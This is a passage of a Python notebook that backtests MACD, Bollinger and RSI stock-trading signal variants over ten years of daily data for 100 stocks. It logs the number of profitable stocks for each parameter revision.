Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(5-20)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(10)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
# +
# REVISION2 BASED ON BACK-TESTING FOR MACD STRATEGY
# try with 4, 15 for macd instead of 5, 20 used. Then compare this outcome against macd9 and determine the buy/sell call
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 55
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(4-15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell list415.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD STRATEGY
# since the earlier attempts to change the MA did not help,
# lets try with taking only those calls into consideration where MACD is positive (so ignoring those that negative)
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 55.
# Overall profit is negative (loss)
# Do this against EMA4-EMA15 MACD; and crossover at MACD9
# BACK-TESTING FOR 10 YEARS - DAILY DATA - ACROSS ALL STOCKS
# ADDITION OF MACD > 0 for any Buy or Sell.... GOT 40/100 positive - BUT LOSS.
# LETS TRY NOW AT MACD > 10.... GOT 43/100 - so getting worser - LOSS
# LETS TRY with MACD > -10... GOT 51/100 - so getting better - PROFIT
# LETS TRY WIYH MACD > -50... GOT 50/100 - but PROFIT increased - seems to be getting better
# LETS TRY WIYH MACD > -100... GOT 51/100 - but PROFIT increased - seems to be getting better
# LETS TRY WIYH MACD > -250... GOT 52/100 - but PROFIT increased - seems to be getting better
# LETS TRY WIYH MACD > -500... GOT 52/100 - but PROFIT started to reduce
# LETS TRY WIYH MACD > -500... GOT 52/100 - but PROFIT increased - seems to be getting better
# LETS TRY WIYH MACD > -1000... GOT 52/100 - but PROFIT increased than -500 - seems to be getting better
# LETS TRY WIYH MACD > -5000... GOT 52/100 - but PROFIT increased - seems to be getting better
# So just playing with MACD value alone does not help. Lets link MACD_REVISED (5,20) with MACD > 0 - got 44... LOSS
# so such MACD value usage could be leading to a problem
# lets try with OBV and see how that works
# MACD REVISED - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'macd'] > 0: # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'macd'] > 0: # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "macd", "(4-15)-9 AND macd > 0", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(20)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\MACD Buy_Sell list415 macd 5000.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD & BOLLINGER STRATEGY
# since the earlier attempts to change the MA did not help,
# lets try with taking only those calls into consideration where MACD is positive (so ignoring those that negative)
# Then do the back-testing to check if this strategy helps get a better nunber of positive from the current 55.
# Overall profit is negative (loss)
# Do this against EMA4-EMA15 MACD; and crossover at MACD9; Bollinger
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Sell": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, macd", "Middle Band & (4-15)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(10)
Summary_Report_df.head(20)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger_macd415.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR MACD & RSI STRATEGY
# Do this against EMA4-EMA15 MACD; and crossover at MACD9; RSI
# Calculate revised MACD
# Revised MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
daily_data_back_test['TradingStrategymacd_revised'] = np.where(daily_data_back_test['macd_revised'] > daily_data_back_test['macd9'], "Buy", "Sell")
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for each stock
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "negative": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive": # additional condition added
if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
Back_Test_10yrs_r.append(row['macd'])
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
